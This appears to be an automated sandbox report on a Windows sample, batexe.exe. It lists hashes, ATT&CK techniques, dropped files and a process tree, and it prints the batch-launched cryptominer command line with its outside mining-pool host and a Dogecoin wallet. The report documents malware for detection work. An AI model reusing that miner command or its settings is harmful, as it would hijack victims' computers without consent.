73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
302s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
20/02/2024, 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4452	b2e.exe
4084	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4084	cpuminer-sse2.exe
4084	cpuminer-sse2.exe
4084	cpuminer-sse2.exe
4084	cpuminer-sse2.exe
4084	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2396-27-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2396 wrote to memory of 4452	2396	batexe.exe	81
PID 2396 wrote to memory of 4452	2396	batexe.exe	81
PID 2396 wrote to memory of 4452	2396	batexe.exe	81
PID 4452 wrote to memory of 4712	4452	b2e.exe	82
PID 4452 wrote to memory of 4712	4452	b2e.exe	82
PID 4452 wrote to memory of 4712	4452	b2e.exe	82
PID 4712 wrote to memory of 4084	4712	cmd.exe	85
PID 4712 wrote to memory of 4084	4712	cmd.exe	85

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2396
- C:\Users\Admin\AppData\Local\Temp\27C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\27C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\27C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1CDA.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4712
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1CDA.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\27C.tmp\b2e.exe

Filesize
14.1MB

MD5
84eb6b5d470ebcae56dece53725fd151

SHA1
67db5078bf4a69c0e3dcb678cd8dd763aebdabe0

SHA256
f6633edd51e16e934875c8bf2b8dfac4b376f5e8757a1d86891e8363079667be

SHA512
22b4edeb6707071eaa4accc909994e8fc94fcf375ec787db102d4ec64bc36bc5846dc20f430db60cd324227079f625b02d82a944590aa4793d56b867f1a64561

Download Submit
C:\Users\Admin\AppData\Local\Temp\27C.tmp\b2e.exe

Filesize
2.6MB

MD5
3f926a5e0b2582a2ad0ab7274cb0ef1a

SHA1
1c8ae453558ecfd90f69800a6962e60d4ecde35b

SHA256
c322f22e131f0cb2e1472fcdab74e55b65847bb381efa0e034dd03487bba4a47

SHA512
acfeeb35600d7bb1d1cbc4f5b7095d456a15a26e2941596d84ad9d9c0f14285f5faf0d4ffa45b8d8d7244cdaca043f0a0e53068836be5f02ac4572f3f70dc2da

Download Submit
C:\Users\Admin\AppData\Local\Temp\27C.tmp\b2e.exe

Filesize
2.4MB

MD5
03489163aeb1ba398a7e97e48917d9e8

SHA1
45db938199be8b7816ce2b7480a9d149420b853b

SHA256
e2c41dcc226f4564d02be2bb1c49f7e483a4131987169921558386cdd69fda27

SHA512
345f2423f4359fac1e3c06c37a8c946cee77451c05db50fce80517de89f996279daeca64fa8d7d32144efd5f8d484792fabc3bdd905f7d95ef2bba6853e3d41c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
859KB

MD5
f993350bd7af6e201abcb9d75c3a7f10

SHA1
a655648def37baca26ef29f9243ff9683f063c5a

SHA256
b22211cfec9086db86345ad32e6efed3b953ac96b51a48dd5be1bb7691738741

SHA512
eea7644efe9d83237d841e18edccc388330d4154e4529bcdb9ea91203340edb1c5bf64aee7eb58d7a5f6881f392ae16dfeaecc471aad9a5d14451ab6672ca994

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
481KB

MD5
a1f2f1228b768f7917ad5184e145c72a

SHA1
a8a8f8ac849d5376f44b4e0ee77f476a70ad32e7

SHA256
01daf6154e9a68735e411207b1dbacc34c04dba065e4925f7956ea6d37b5edb9

SHA512
9cb8f37181a5fa6786d69e3834e3b1a0a8b64ee0152b6d1fd3de6974a520167483190a7deca005fc9c582645353b83797c744cc72372cd855bab409d1964d14b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
508KB

MD5
565397499deb97842a2fc488c1d47e0b

SHA1
2b71501c9f069a84b8234f77d90066694a98d3c6

SHA256
cc4d0de5602bfa72ae049d1c2d95091c21008f1769552edf32cbe6f1281780d4

SHA512
eeaf7187904d572e96f2d1aabe9dac1cf592d3800087f2f51fca9a9ac17b632acc6f16bd9fd344dfa041e1a093571daf54c1f6bbe1e85cf25ba7e1aabdb893e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
638KB

MD5
a8888b78978a81aa0dc9e697936a8f74

SHA1
fedcdad2409fb3e0b4bc783aabd9b651f92cd710

SHA256
367f72c79005abfeb1fe3fcbae9d773e17b0eb990d6752930008623b40232f7f

SHA512
69ad956e4f901e6186f4d1a9e452848faf5b4cfe0ffc4aa83099e56ece9469f429c2c7e77aa201d7674562376843ae8842879e61d78ca04bb471f5a7db1f214a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
482KB

MD5
ef124ee80a9f8d9493edcb2d4c88c0e8

SHA1
9cce3387b00ac31e75320edace967f435d494927

SHA256
0713be5b78958a036e45ee580742df50a6f08931b78e871427f05416dc8dd53d

SHA512
3c94f7af979213bb7bd0f13a32283929cc341043fc36106a1210644331cc4b4733dd519d415d7eda676c8c7f17c8f8df69d92b87e39f26da060813d7fa3cf0ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
731KB

MD5
4a10dc6e7edc4a255a17b74f2b0482c9

SHA1
e7d47313ccfea5f4aef67157755955563c1d2cea

SHA256
55ef5d4f646f6d8d550cfbd214428d27a4b166a1e8babc91625018756c0145ee

SHA512
599d7447c6ce2bb120161dc4b08f8949f71132ee45a32f11711d3383b5065ddf97199c57fe2f66a7add97dbc23b537f9a8a710b28b986efa77cfd05291553d26

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
625KB

MD5
791f61f87a640547a5441366bdc1fbc6

SHA1
d73a3365ba4b74bd75e5a63bf75c35eafad64416

SHA256
faa2b1fecafec34a5f0da0f267c3ce22612017729c99feedd64ab0d8ae15ee7a

SHA512
5a35deff1974a7c28b80b3485586dcb7136410233ae9f8bada68e122954a636b641ddd02a824aa84fddd24521ec7c74f593c56f91c5d916dfc47b9df46289dda

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
658KB

MD5
0119194b679feec9301a0a363d00fede

SHA1
02a5cb61a822dfa8b15d0cb699f8fb9424523530

SHA256
bbb143bdaa75f0362a256b5a5667478af4997cd313208ca513d6b9984064a898

SHA512
c19356baf6ba02980346e41c736b1251d17f9bc06fafd32c62d1ae75fabbf00024e624e394b1e4900abbac48c976656c89b72777da9b6ea7b97746ced30c0bd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
523KB

MD5
401db79e0c6c90051a6434028aa1f1c6

SHA1
92e7b338d45f5f13f56593fa34335c6b80fd8cd6

SHA256
a8515c5133a03c7673919e9981e96708178c589089810d498da82dbd3a87cd02

SHA512
969a23ba3dbcb8d6a7671de8a2796e5af6b11c4f86efa939d149886568b39fdfca89c5bb2a1d8edd201fa417ccce04479006e2e22e6948dffcd440b6f0b25ee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
542KB

MD5
d8f909f93cda9553dc05715f9d431296

SHA1
7966a1c12b4be5e8528030abbd1919eb1dfbb026

SHA256
884421e8fe691712355b1d7ef0b65d9f320772fdb58f8091fbbf5c44d0749939

SHA512
3088ae90310fcf031f7e1e8b2b63c9dad0ba81a618f4b8db51e7b17aa20ebfa41c96c47238625e2db84379625f9ab1710e329e2b769f504bebec4102d4e55d0f

Download Submit
memory/2396-27-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4084-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4084-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4084-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4084-45-0x00000000635D0000-0x0000000063668000-memory.dmp

Filesize
608KB

Download
memory/4084-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4084-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4084-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4084-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4084-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4084-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4084-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4084-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4452-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4452-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download